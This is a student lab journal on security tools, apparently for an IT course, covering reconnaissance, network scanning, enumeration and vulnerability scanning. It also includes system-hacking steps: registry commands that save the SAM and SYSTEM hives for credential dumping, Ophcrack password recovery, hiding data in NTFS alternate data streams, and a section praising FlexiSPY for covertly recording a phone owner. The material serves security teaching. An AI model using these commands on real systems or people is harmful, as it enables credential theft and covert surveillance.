Scribd
Upload
15 views140 pages

Security Breaches: Tools & Countermeasures

The document provides a comprehensive guide on various tools and techniques for performing security assessments, including footprinting, reconnaissance, network scanning, enumeration, vulnerability analysis, and system hacking. It details specific tools like Recon-ng, FOCA, Metasploit, and Nmap, along with instructions for their usage. Additionally, it covers methods for web application security, cryptography, and countermeasures against security breaches.

Uploaded by

vy.vishal.970
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
15 views140 pages

Security Breaches: Tools & Countermeasures

The document provides a comprehensive guide on various tools and techniques for performing security assessments, including footprinting, reconnaissance, network scanning, enumeration, vulnerability analysis, and system hacking. It details specific tools like Recon-ng, FOCA, Metasploit, and Nmap, along with instructions for their usage. Additionally, it covers methods for web application security, cryptography, and countermeasures against security breaches.

Uploaded by

vy.vishal.970
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

[Link].

IT Sem III Security Breaches and Countermeasures Journal

INDEX
Sr. Page
Title Sign
No. No.
a. Use the following tools to perform footprinting and
reconnaissance
i. Recon-ng (Using Kali Linux)
ii. FOCA Tool
iii. Windows Command Line Utilities
• Ping
• Tracert using Ping
• Tracert
• NSLookup
iv. Website Copier Tool – HTTrack
v. Metasploit (for information gathering)
vi. Whois Lookup Tools for Mobile – DNS Tools, Whois,
Ultra Tools Mobile
1
vii. Smart Whois
viii. eMailTracker Pro
ix. Tools for Mobile – Network Scanner, Fing – Network
Tool, Network Discovery Tool, Port Droid Tool
b. Scan the network using the following tools:
i. Hping2 / Hping3
ii. Advanced IP Scanner
iii. Angry IP Scanner
iv. Masscan
v. NEET
vi. CurrPorts
vii. Colasoft Packet Builder
viii. The Dude
2 a. Use Proxy Workbench to see the data passing through it
and save the data to file.
b. Perform Network Discovery using the following tools:
i. Solar Wind Network Topology Mapper
ii. OpManager
iii. Network View
iv. LANState Pro
c. Use the following censorship circumvention tools:
i. Alkasir
pg. 1
[Link]. IT Sem III Security Breaches and Countermeasures Journal
ii. Tails OS

d. Use Scanning Tools for Mobile – Network Scanner, Fing –


Network Tool, Network Discovery Tool, Port Droid Tool
a. Perform Enumeration using the following tools:
i. Nmap
ii. NetBIOS Enumeration Tool
iii. SuperScan Software
iv. Hyena
v. SoftPerfect Network Scanner Tool
3 vi. OpUtils
vii. SolarWinds Engineer’s Toolset
viii. Wireshark
b. Perform the vulnerability analysis using the following
tools:
i. Nessus
ii. OpenVas
a. Perform mobile network scanning using NESSUS
b. Perform the System Hacking using the following tools:
i. Winrtgen
ii. PWDump
iii. Ophcrack
iv. Flexispy
4
v. NTFS Stream Manipulation
vi. ADS Spy
vii. Snow
viii. Quickstego
ix. Clearing Audit Policies
x. Clearing Logs
a. Use wireshark to sniff the network.
b. Use SMAC for MAC Spoofing.
5 c. Use Caspa Network Analyser.
d. Use Omnipeek Network Analyzer.

6 a. Use Social Engineering Toolkit on Kali Linux to perform


Social Engineering using Kali Linux.
b. Perform the DDOS attack using the following tools:
i. HOIC

pg. 2
[Link]. IT Sem III Security Breaches and Countermeasures Journal
ii. LOIC
iii. HULK
iv. Metasploit
c. Using Burp Suite to inspect and modify traffic between the
browser and target application.
a. Perform Web App Scanning using OWASP Zed Proxy.
b. Use droidsheep on mobile for session hijacking
c. Demonstrate the use of the following firewalls:
i. Zonealarm and analyse using Firewall Analyzer.
ii. Comodo Firewall
d. Use HoneyBOT to capture malicious network traffic.
7
e. Use the following tools to protect attacks on the web
servers:
i. ID Server
ii. Microsoft Baseline Security Analyzer
iii. Syhunt Hybrid

a. Protect the Web Application using dotDefender.


b. Demonstrate the following tools to perform SQL Injection:
8 i. Tyrant SQL
ii. Havij
iii. BBQSQL
Use Aircrack-ng suite for wireless hacking and
9
countermeasures.
Use the following tools for cryptography
i. HashCalc
10 ii. Advanced Encryption Package
iii. TrueCrypt
iv. CrypTool

Practical No. 1
pg. 3
[Link]. IT Sem III Security Breaches and Countermeasures Journal
A. Tools to perform footprinting and reconnaissance
Footprinting and reconnaissance are used to collect basic information about the target systems
in order to exploit them. The target information is IP location information, routing information,
business information, address, phone number and DNS records.
i. Recon-ng (Using Kali Linux)
Recong0-ng is a full feature Web Reconnaissance framework used for information gathering
purpose as well as network detection. This tool is written in python, having independent
modules, database interaction and other features. You can download the software from
[Link]. This Open Source Web Reconnaissance tool requires kali Linux Operating
system.
1- Run the Application Recon-ng or open the terminal of Kali-Linux and type recon-ng and hit
enter.

2- Enter the command “show modules” to show all independent modules available.

pg. 4
[Link]. IT Sem III Security Breaches and Countermeasures Journal
3- You can search for any entity within a module. For example, in above figure, the command
“Search Netcraft” is used.

4- To use the Netcraft module, use the command syntax “use recon/domain-hosts/Netcraft”
and hit enter.

5- Set the source by the command “set source [domain].” Press enter to continue. Type Run to
execute and press enter.

pg. 5
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ii. FOCA Tool


FOCA stands for Fingerprinting Organizations with Collected Archives. FOCA tool finds
Metadata, and other hidden information within a document may locate on web pages. Scanned
searches can be downloaded and Analyzed. FOCA is a powerful tool which can support various
types of documents including Open Office, Microsoft Office, Adobe InDesign, PDF, SVG, and
others. Search uses three search engines, Google, Bing, and DuckDuckGo.

1- Download the software FOCA from [Link] Now,Go to Project >


New Project.

pg. 6
[Link]. IT Sem III Security Breaches and Countermeasures Journal
2- Now, Enter the Project Name, Domain Website, Alternate Website (if required), Directory
to save the results, Project Date. Click Create to proceed.

3- Select the Search Engines, Extensions, and other parameters as required. Click on Search
All Button.

4 -Once Search completes, the search box shows multiple files. You can select the file,
download it, Extract Metadata, and gather other information like username, File creation date,
and Modification.

pg. 7
[Link]. IT Sem III Security Breaches and Countermeasures Journal

iii. Windows Command Line Utilities


Consider a network where you have access to a Windows PC connected to the Internet. Using
Windows-based tools, let's gather some information about the target. You can assume any target
domain or IP address, in our case, we are using [Link] as a target.

Topology Diagram:

• Ping
1- Open Windows Command Line (cmd) from Windows PC

pg. 8
[Link]. IT Sem III Security Breaches and Countermeasures Journal
2 -Enter the command “ Ping [Link] ” to ping.

From the output, you can observe and extract the following information:
 [Link] is live
 IP address of [Link].
 Round Trip Time
 TTL value
 Packet loss statistics
3- Now, Enter the command “ Ping [Link] –f –l 1500 ” to check the value of fragmentation.

The output shows “ Packet needs to be fragmented but DF set ” which means 150o bits will
require being fragmented. Let’s try again with smaller value:

pg. 9
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Output again shows “ Packet needs to be fragmented but DF set ” which means 140o bits will
require being fragmented. Let’s try again with smaller value:

Output again shows “ Packet needs to be fragmented but DF set ” which means 130o bits will
require being fragmented. Let’s try again with smaller value:

The output shows the reply now, which means 1200 bits will not require being fragmented. You
can try again to get the more appropriate fragment value.

pg. 10
[Link]. IT Sem III Security Breaches and Countermeasures Journal
• Tracert using Ping
Enter the command “ Tracert [Link] ” to trace the target.

From the output, you can get the information about hops between the source (your PC) and the
destination ([Link]), response times and other information.

• Tracert
Tracert options are available in all operating system as a command line feature. Visual
traceroute, graphical and other GUI based traceroute applications are also available. Traceroute
or Tracert command results in the path information from source to destination in the hop by hop
manner. The result includes all hops in between source to destination. The result also
includes latency between these hops.

Consider an example, in which an attacker is trying to get network information by using tracert.
After observing the following result, you can identify the network map.

pg. 11
[Link]. IT Sem III Security Breaches and Countermeasures Journal

[Link] is the first hop, which means it is the gateway. Tracert result of [Link] shows,
[Link] is another interface of first hop device whereas connected IP includes [Link]
& [Link].

[Link] is next to last hop [Link]. It can either connected to [Link] or


[Link]. To verify, trace next route.

[Link] is another interface of the network device, i.e. [Link] connected next to
[Link]. [Link], [Link] & [Link] are connected directly to [Link].

pg. 12
[Link]. IT Sem III Security Breaches and Countermeasures Journal

[Link] is another interface of the network device i.e. [Link] connected next to
[Link]. [Link], [Link] & [Link] are connected directly to [Link].

Traceroute Tools
Traceroute tools are listed below: -

Traceroute Tools Website


Path Analyzer Pro [Link]
Visual Route [Link]
Troute [Link]
3D Traceroute [Link]
The following figure shows graphical view and other trace information usingVisual Route tool.

pg. 13
[Link]. IT Sem III Security Breaches and Countermeasures Journal
• DNS Zone Transfer Enumeration Using NSLookup
Nslookup (stands for “Name Server Lookup”) is a useful command for getting information from
the DNS server. It is a network administration tool for querying the Domain Name System
(DNS) to obtain domain name or IP address mapping or any other specific DNS record. It is also
used to troubleshoot DNS-related problems.
In the enumeration process through DNS Zone transfer, attacker find the target's TCP port 53, as
TCP port 53 is used by DNS and Zone transfer uses this port by default. Using port scanning
techniques, you can find if the port is open.

DNS Zone transfer is the process that is performed by DNS. In the process of Zone transfer,
DNS passes a copy containing database records to another DNS server. DNS Zone transfer
process provides support for resolving queries, as more than one DNS server can respond to the
queries.

Consider a scenario in which both primary and secondary DNS Servers are responding to the
queries. Secondary DNS server gets the DNS records copy to update the information in its
database.

1. Go to Windows command line (CMD) and enter Nslookup and press Enter.

2. Command prompt will proceed to " > " symbol.


3. Enter " server <DNS Server Name> " or " server <DNS Server Address> ".
4. Enter set type=any and press Enter. It will retrieve all records from a DNS server.
5. Enter ls -d <Domain> this will display the information from the target domain (if allowed).

6. If not allowed, it will show the request failed.

pg. 14
[Link]. IT Sem III Security Breaches and Countermeasures Journal

7. Linux support dig command, At a command prompt enter dig <[Link]> axfr.

iv. Website Copier tool (HTTrack)

1- Download and Install the WinHTTrack Website Copier Tool from the website
[Link] You can check the compatibility of HTTrack Website copier tool
on different platforms such as Windows, Linux, and Android from the website.

2- HTTrack Website Copier tool installation.

pg. 15
[Link]. IT Sem III Security Breaches and Countermeasures Journal

3- Click Next

4- Enter a Project name, as in our case, Testing_Project.

pg. 16
[Link]. IT Sem III Security Breaches and Countermeasures Journal

5- Click on Set Options button.

6- Go to Scan Rules Tab and Select options as required.

pg. 17
[Link]. IT Sem III Security Breaches and Countermeasures Journal

7- Enter the Web Address in the field and Click Next.

8- Click Next.

pg. 18
[Link]. IT Sem III Security Breaches and Countermeasures Journal

9- Click Browse Mirrored Website.

pg. 19
[Link]. IT Sem III Security Breaches and Countermeasures Journal
10- Select your favorite web browser.

Observed the above output. [Link] website is copied into a local directory and browsed
from there. Now you can explore the website in an offline environment for the structure of the
website and other parameters.

pg. 20
[Link]. IT Sem III Security Breaches and Countermeasures Journal
To make sure, compare the website to the original [Link] website. Open a new tab and
go to URL [Link].

v. Metasploit (for information gathering)


In this lab, we are using Metasploit Framework, default application in Kali Linux for gathering
more information about the host in a network. A Metasploit Framework is a powerful tool,
popularly used for scanning & gathering information in the hacking environment. Metasploit
Pro enables you to automate the process of discovery and exploitation and provides you with
the necessary tools to perform the manual testing phase of a penetration test. You can use
Metasploit Pro to scan for open ports and services, exploit vulnerabilities, pivot further into a
network, collect evidence, and create a report of the test results.

Topology Information: In this lab, we are running Metasploit Framework on a private network
[Link]/24 where different hosts are live including Windows 7, Kali Linux, Windows Server
2016 and others.

1- Open Kali Linux and Run Metasploit Framework.

pg. 21
[Link]. IT Sem III Security Breaches and Countermeasures Journal

2- Metasploit Framework initialization as shown below in the figure.

pg. 22
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 23
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 24
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 25
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 26
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 27
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 28
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 29
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 30
[Link]. IT Sem III Security Breaches and Countermeasures Journal
msf > hosts

pg. 31
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 32
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 33
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Observe the OS_Flavor field. SMB scanning scans for Operating System Flavor for the RHOST
range configured.

vi. Whois Lookup Tools for Mobile – DNS Tools, Whois, Ultra Tools Mobile

"WHOIS" helps to gain information regarding domain name, ownership information. IP


Address, Netblock data, Domain Name Servers and other information’s. Regional Internet
Registries (RIR) maintain WHOIS database. WHOIS lookup helps to find out who is behind the
target domain name.
pg. 34
[Link]. IT Sem III Security Breaches and Countermeasures Journal

1. Go to the URL [Link]

2. A search of Target Domain

pg. 35
[Link]. IT Sem III Security Breaches and Countermeasures Journal

WHOIS Lookup Result Analysis


Lookup Result shows complete domain profile, including
 Registrant information
 Registrant Organization
 Registrant Country
 Domain name server information
 IP Address
 IP location
 ASN
 Domain Status
 WHOIS history
 IP history,
 Registrar history,
 Hosting history
It also includes other information such as Email and postal address of registrar & admin along
with contact details. You can go to [Link] can enter the targeted URL
for whois lookup information

pg. 36
[Link]. IT Sem III Security Breaches and Countermeasures Journal

vii. Smart Whois


You can download software “SmartWhois” from [Link] for Whois lookup as shown
in the figure below: -

viii. eMailTracker Pro

pg. 37
[Link]. IT Sem III Security Breaches and Countermeasures Journal
eMailTrackerPro is a Windows based email tracker that can be used to monitor employees,
senders and recipients. This powerful tool can be used in conjunction with other programs such
as Windows Nuke (also known as Spamwasher) to quickly identify where a computer has been
and how it has been used.

Click on Trace Headers/Trace email address and enter the Message Header and click Okay. The
Status of the Trace will be shown inside Trace Reports

ix. Tools for Mobile – Network Scanner, Fing – Network Tool, Network
Discovery Tool, Port Droid Tool

pg. 38
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Scanning Tool for Mobile

pg. 39
[Link]. IT Sem III Security Breaches and Countermeasures Journal

b. Scan the network using the following tools:


i. Hping2 / Hping3
Hping is a command-line TCP/IP packet assembler and analyzer tool that is used to send
customized TCP/IP packets and display the target reply as ping command display the ICMP
Echo Reply packet from targeted host. Hping can also handle fragmentation, arbitrary packets
body, and size and file transfer. It supports TCP, UDP, ICMP and RAW-IP protocols. Using
Hping, the following parameters can be performed: -

 Test firewall rules.


 Advanced port scanning.
 Testing net performance.
 Path MTU discovery.
 Transferring files between even fascist firewall rules.
 Traceroute-like under different protocols.
pg. 40
[Link]. IT Sem III Security Breaches and Countermeasures Journal
 Remote OS fingerprinting & others

Using Hping commands on Kali Linux, we are pinging a Window 7 host with different
customized packets in this lab.

 To create an ACK packet:


root@kali:~# hping3 –A [Link]

 To create SYN scan against different ports:


root@kali:~# hping3 -8 1-600 –S [Link]

 To create a packet with FIN, URG, and PSH flags sets


root@kali:~# hping3 –F –P -U [Link]

pg. 41
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ii. Advanced IP Scanner


Advanced IP Scanner is a fast and powerful network scanner with a user-friendly interface.
In seconds, Advanced IP Scanner can locate all computers on your wired or wireless local
network and scan their ports. The program provides easy access to various network resources
such as HTTP, HTTPS, FTP, and shared folders.

iii. Angry IP Scanner

Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner
designed to be fast and simple to use. It scans IP addresses and ports as well as has many other
features.

pg. 42
[Link]. IT Sem III Security Breaches and Countermeasures Journal
It is widely used by network administrators and just curious users around the world, including
large and small enterprises, banks, and government agencies.

It runs on Linux, Windows, and Mac OS X, possibly supporting other platforms as well.

iv. Masscan
MASSCAN is TCP port scanner which transmits SYN packets asynchronously and
produces results similar to nmap, the most famous port scanner. Internally, it operates more
like scanrand, unicornscan, and ZMap, using asynchronous transmission. It's a flexible utility
that allows arbitrary address and port ranges.
Scan for a selection of ports (-p22,80,445) across a given subnet ([Link]/24):
root@kali:~# masscan -p22,80,445 [Link]/24

Starting masscan 1.0.3 ([Link] at 2014-05-13 21:35:12 GMT


-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [3 ports/host]
Discovered open port 22/tcp on [Link]
Discovered open port 445/tcp on [Link]
Discovered open port 80/tcp on [Link]
v. NEET
Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-
ordinates the use of numerous other open-source network tools, with the aim of gathering as
much network information as possible in clear, easy-to-use formats. The core scanning engine
finds and identifies network services, the modules test or enumerate those services, and the Neet
pg. 43
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Shell provides an integrated environment for processing the results and exploiting known
vulnerabilities. As such, it sits somewhere between manually running your own port scans and
subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many
options which allow the user to tune the test parameters for network scanning in the most
efficient and practical way.

vi. CurrPorts
Case Study: Using the Previous lab, we are going to re-execute HTTP Remote Access Trojan
(RAT) on Windows 12 machine ([Link]) and observed the TCP/IP connections to detect
and kill the connection.

Topology:

Configuration:
1. Run the application Currports on Windows Server 2016 and observe theprocesses.

pg. 44
[Link]. IT Sem III Security Breaches and Countermeasures Journal

[Link] the HTTP Trojan created in the previous lab

The new process is added to the list.


You can observe the process name, Protocol, Local and remote port and IP address information.
3. For more detail, right click on [Link] and go to properties

pg. 45
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Properties are showing more details about tcp connection.


4. Go to Windows 7 machine and initiate the connection as mentioned in the previous lab using a
web browser.

Connection successfully established.


5. Back to Windows Server 2016, Kill the connection.

pg. 46
[Link]. IT Sem III Security Breaches and Countermeasures Journal

6. To verify, retry to establish the connection from windows 7.

vii. Colasoft Packet Builder


Colasoft Packet Builder software enables to create the customized network packets. These
Customized Network packets can penetrate the network for attacks. Customization can also use
to create fragmented packets. You can download the software from [Link].

pg. 47
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Colasoft packet builder offers Import and Export options for a set of packets. You can also add
a new packet by clicking Add/button. Select the Packet type from the drop-down option.
Available options are: -
 ARP Packet
 IP Packet
 TCP Packet
 UDP Packet

After Selecting the Packet Type, now you can customize the packet, Select the Network
Adapter and Send it towards the destination.

viii. The Dude

The Dude network monitor is a new application by MikroTik which can dramatically improve
the way you manage your network environment. It will automatically scan all devices within
specified subnets, draw and layout a map of your networks, monitor services of your devices and
alert you in case some service has problems.

pg. 48
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Main Features:

 Auto network discovery and layout


 Discovers any type or brand of device
 Device, Link monitoring, and notifications
 Includes SVG icons for devices, and supports custom icons and backgrounds
 Easy installation and usage
 Allows you to draw your own maps and add custom devices
 Supports SNMP, ICMP, DNS and TCP monitoring for devices that support it
 Individual Link usage monitoring and graphs
 Direct access to remote control tools for device management
 Supports remote Dude server and local client

pg. 49
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 50
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 2
a. Use Proxy Workbench to see the data passing through it and save the data
to file.
Proxy Workbench is a unique proxy server ideal for developers, trainers and security experts
that displays its data in real-time. You can actually see the data flowing between your e-mail
client and the e-mail server, web browser and web server or even analyse FTP in both Passive
and Active modes. In addition, the 'pass through' protocol handler enables analysis of protocols
where the server does not readily change.

The best feature is the animated connection diagram that graphically represents the history of
each socket connection and allows you to drill into the finest of detail. This animation can even
be exported to HTML and saved to the web!

b. Perform Network Discovery using the following tools:


i. Solar Wind Network Topology Mapper
SolarWinds Network Topology Mapper (NTM) shows nodes on your network, indicates and updates
status both for the nodes and the network connections between them in interrelated, scalable maps
with customizable icons.

pg. 51
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ii. OpManager
OpManager is an advanced network monitoring tool which offers fault management, supporting
over WAN links, Router, Switch, VoIP & servers. It can also perform performance
management.

iii. Network View


NetworkView is a network visualization tool that aims to provide a simple interface for the
complex function involved in the discovery and monitoring of multi-vendor IP networks.
With NetworkView you can get a quick overview of your network, whether it is a small office
or a corporate network. Version 3 adds functionalities oriented to network management tasks.

pg. 52
[Link]. IT Sem III Security Breaches and Countermeasures Journal
NetworkView uses multiple methods such as ICMP, MDNS, SSDP, DNS, NetBIOS, SNMP
MIB-2, Bridge MIB, LLDP, CPD and propietary MIB’s to discover devices and generates a
graphical representation of your network. NetworkView generates views of both logical and
physical network structure. Virtual structure representation is also displayed for wireless
systems (Cisco, Aruba/Alcatel-Lucent and Fortinet).

iv. LANState Pro


LANState is a simple network topology mapping, host monitoring, and management
program. Monitor the service availability. Manage servers, computers, switches, and other
devices easier using the graphic map. Access devices' properties, RDP, web UI faster.

pg. 53
[Link]. IT Sem III Security Breaches and Countermeasures Journal

c. Use the following censorship circumvention tools:


i. Alkasir
Alkasir was created to bypass restrictions imposed by ISPs, "to allow users to access information about
their countries and regions that are concealed by the states mainly because of political reasons.

ii. Tails OS
Tails OS is used by journalists, activists, and others to keep their digital activity safe and anonymous.
Learn about the operating system and how to source it safely. Tails, which stands for The Amnesic
Incognito Live System, is an open-source, security and privacy-focused operating system.
pg. 54
[Link]. IT Sem III Security Breaches and Countermeasures Journal

d. Use Scanning Tools for Mobile – Network Scanner, Fing – Network Tool,
Network Discovery Tool, Port Droid Tool
There are several basic and advanced network tools available for the Mobile device on application
stores. The following are some effective tools for network Scanning.

pg. 55
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 3
a. Perform Enumeration using the following tools:
i. Nmap
NMAP, as we know, is a powerful networking tool which supports many features and
commands. Operating System detection capability allows to send TCP and UDP packet and
observe the response from the targeted host. A detailed assessment of this response bring some
clues regarding nature of an operating system disclosing the type an OS. To perform OS
detection with nmap perform the following: nmap -O<ip address>

ii. NetBIOS Enumeration Tool


NetBIOS stands for Network Basic Input Output System. It Allows computer communication
over a LAN and allows them to share files and printers. NetBIOS names are used to identify
network devices over TCP/IP (Windows).

pg. 56
[Link]. IT Sem III Security Breaches and Countermeasures Journal

iii. SuperScan
SuperScan is a multi-functional tool that will help you manage your network and make sure
your connections and TCP ports are working as well as they should be. One of the best features
or advantages of this tool is just how quickly it works. The scans are made very rapidly and
faster than with most other scanning tools out there.

pg. 57
[Link]. IT Sem III Security Breaches and Countermeasures Journal
iv. Hyena
Hyena is GUI based, NetBIOS Enumeration tool that shows Shares, User login information and
other related information

v. SoftPerfect Network Scanner Tool


SoftPerfect Network Scanner can ping computers, scan ports, discover shared folders and
retrieve practically any information about network devices via WMI, SNMP, HTTP, SSH and
PowerShell.

pg. 58
[Link]. IT Sem III Security Breaches and Countermeasures Journal

vi. OpUtils
OpUtils is a IP address and Switch port management software that is geared towards
helping engineers efficiently monitor, diagnose and troubleshoot IT resources. OpUtils
complements existing management tools by providing trouble shooting and real-time
monitoring capabilities.

pg. 59
[Link]. IT Sem III Security Breaches and Countermeasures Journal

vii. SolarWinds Engineer’s Toolset


Engineer's Toolset provides the tools you need as a network engineer or consultant to get
your job done. Toolset includes solutions that provide diagnostic, performance, and bandwidth
measurements.

viii. Wireshark
pg. 60
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting,
analysis, software and communications protocol development, and education. Originally named
Ethereal, the project was renamed Wireshark in May 2006 due to trademark issues

b. Perform the vulnerability analysis using the following tools:


i. Nessus
Nessus is a proprietary vulnerability scanner developed by Tenable, Inc. [Link] is a
subscription-based service. Tenable also contains what was previously known as Nessus Cloud,
which used to be Tenable’s Software-as-a-Service solution. Nessus is an open-source network
vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy
cross-linking between compliant security tools. In fact, Nessus is one of the many vulnerability
scanners used during vulnerability assessments and penetration testing engagements, including
malicious attacks. Nessus is a tool that checks computers to find vulnerabilities that hackers
COULD exploit.

pg. 61
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ii. OpenVas

OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated and


authenticated testing, various high-level and low-level internet and industrial protocols,
performance tuning for large-scale scans and a powerful internal programming language to
implement any type of vulnerability test.
The scanner obtains the tests for detecting vulnerabilities from a feed that has a long history and
daily updates.

OpenVAS has been developed and driven forward by the company Greenbone Networks since
2006. As part of the commercial vulnerability management product family Greenbone Enterprise
Appliance, the scanner forms the Greenbone Community Edition together with other open-
source modules.

pg. 62
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 63
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 4
a. Perform mobile network scanning using NESSUS
Nessus has implemented new features to help users combat mobile threats. Network-based
scanning is not the right approach to identify vulnerabilities on mobile devices, due in large part
to the fact that most devices are in "sleep" mode and/or using a 3G/4G network. However, MDM
(Mobile Device Management) technologies maintain information about the devices, including
information about security vulnerabilities.
With Nessus Manager, the Nessus Mobile Devices plugin family allows you to obtain
information from devices registered in a Mobile Device Manager (MDM) and from Active
Directory servers that contain information from Microsoft Exchange Servers.
 To query for information, the Nessus scanner must be able to reach the Mobile Device
Man-agement servers. Ensure no screening devices block traffic to these systems from
the Nessus scanner. In addition, you must give Nessus administrative credentials (for
example, domain administrator) to the Active Directory servers.
 To scan for mobile devices, you must configure Nessus with authentication information
for the management server and the mobile plugins. Since Nessus authenticates directly to
the management servers, you do not need to configure a scan policy to scan specific
hosts.
 For ActiveSync scans that access data from Microsoft Exchange servers, Nessus retrieves
information from phones that have been updated in the last 365 days.

pg. 64
[Link]. IT Sem III Security Breaches and Countermeasures Journal
b. Perform the System Hacking using the following tools:
i. Winrtgen
In this article, we will go through the process of generating rainbow tables using WinRTGen.

To generate rainbow tables first we will have to modify the properties of WinRTGen according
to our need, and to do so Click on “Add Table“. After this, a new box will appear named
“Rainbow Table Properties”

pg. 65
[Link]. IT Sem III Security Breaches and Countermeasures Journal
In the “Rainbow Table Properties” window we have the option to modify settings in order to
generate rainbow tables according to our needs. The following properties can be modified:

 Hash: The type of encryption we want the rainbow table to be generated. For example
MD5, MD4, SHA1, etc.

pg. 66
[Link]. IT Sem III Security Breaches and Countermeasures Journal
After assigning the values to the properties according to our needs click on “Benchmarks”. This
will show the estimated time, Hash speed, Step speed, Table Pre-computing time, etc. that will
be required to generate the Rainbow Table according to assigned properties.

After “Benchmark” click on “Ok”. This will add the Rainbow Table to the queue in the main
window of
WinRTGen

pg. 67
[Link]. IT Sem III Security Breaches and Countermeasures Journal
After this click on “Rainbow Table” You want to start processing and click “OK” .

After clicking on ‘OK’ the WinRTGen” will start generating a rainbow table.

After completion, the window will appear as follows.

pg. 68
[Link]. IT Sem III Security Breaches and Countermeasures Journal

This table will be saved to your WinRTGen Directory.

ii. PWDump
The Security Account Manager, or SAM for short, controls all user accounts and passwords.
Every password is hashed before being saved in SAM. Passwords that are hashed and saved in
SAM can be retrieved in the registry; simply open the Registry Editor and navigate to HKEY
LOCAL MACHINESAM. SAM is located in C:\Windows\System32\config.
This utility was created by Tarasco. This utility dumps the system’s SAM file’s credentials after
extracting it.
This utility was created by Tarasco. This utility dumps the system’s SAM file’s credentials after
extracting it. Simply enter the following line on the command prompt after downloading to use
this tool:

pg. 69
[Link]. IT Sem III Security Breaches and Countermeasures Journal
[Link]

As a result, it will spill all the hashes kept in the SAM file. The next step is to use the commands
below to save the registry values for the SAM file and system file in a system file:

reg save hklm\sam c:\sam


reg save hklm\system c:\system

iii. Ophcrack
When it comes to free Windows password crackers, users usually opt for Ophcrack as it is free
and easily available.
Step 1: Since we are assuming that your Windows PC is locked and you do not know the
password, the first step needs to be carried out on a different PC with internet access and
administrator privileges.
Step 2 : Download the correct version of Ophcrack Live CD from the official website to the
second PC.
Step 3 : Burn the ISO file to a USB or CD. To do this, you will need an ISO burning
application. Now proceed to the next step of the password reset process.
Step 4 : Remove the bootable media from the second PC and insert it into your locked
Windows machine. Let the computer boot up from this media instead of the native Windows
installation. This is made possible by the fact that Ophcrack itself contains a small operating
system that can run independently of your Windows OS. In a few moments, you will see the
Ophcrack interface on your computer.
Step 5 : You will now see a menu with 4 options. Leave it on the default option, which is

pg. 70
[Link]. IT Sem III Security Breaches and Countermeasures Journal
automatic. After a few seconds, you will see the Ophcrack Live CD loading and then the disk
partition information being displayed as Ophcrack identifies the one with the SAM file.
Step 6 : Once the process has been complete, you will see a window with several user accounts
and their passwords displayed in column format. Against the previously locked username, look
for an entry in the NT Pwd column.
Step 7: This will be your recovered password, so note it down. You can now remove the Live
CD from the drive and restart your computer. You will be able to login to your user account
using the password that was recovered by Ophcrack.

iv. Flexispy

FlexiSPY is a phone application which comes with an android keylogger for the phone as a
feature. It will always appear in the list whenever one is speaking about the world’s best spy
phone applications. This app comes with everything you expect when looking for a monitoring
system for your phone.

It will help you record phone calls, capture SMS, WhatsApp messages, even capture keystrokes,
allow you to read emails, read Facebook messages.

The app will as well track the device and you know what, from where you are you can turn on its
recorder and record conversations without the owner noticing.
pg. 71
[Link]. IT Sem III Security Breaches and Countermeasures Journal

v. NTFS Stream Manipulation


NTFS is a filesystem that stores files utilizing two data streams known as NTFS data streams,
as well as file attributes. The first data stream contains the security descriptor for the file to be
stored, such as permissions, while the second contains the data contained within a file. Another
form of the data stream that can be found within each file is an alternate data stream (ADS).

ADS is a file attribute available solely in NTFS, and it refers to any type of data associated with
a file but not in the file itself on an NTFS system. NTFS ADS is a Windows hidden stream that
stores file metadata such as properties, word count, access and author name, and modification
timings.

ADSs can fork data into existing files without changing or altering their functionality, size, or
display to file-browsing utilities. They enable an attacker to inject malicious code into files on a
vulnerable system and execute them without the user knowing. Attackers use ADS to hide
rootkits or hacker tools on a breached system and allow users to execute them while hiding from
the system administrator.

Once the ADS is attached to a file, the size of the original file will not change. One can only
identify the changes in files through modification of timestamps, which can be innocuous.

Creation of NTFS streams:

When the user reads or writes a file, their only manipulation in the main data stream by default.
The following is the syntax of ADSs

[Link]:alternativeNmae

pg. 72
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Open the terminal and type the following command to create a file named file_1.txt. echo
"this is file no 1" > file_1.txt

Now, type the following command to write to the stream named [Link]. echo "this is a
hidden file inside the file_1.txt" > file_1.txt:[Link]

We’ve just created a stream named [Link] that is associated with file_1.txt and when you
look at the file_1.txt you will only find the data present in file_1.txt. And also stream will
not be shown in the directory as well.

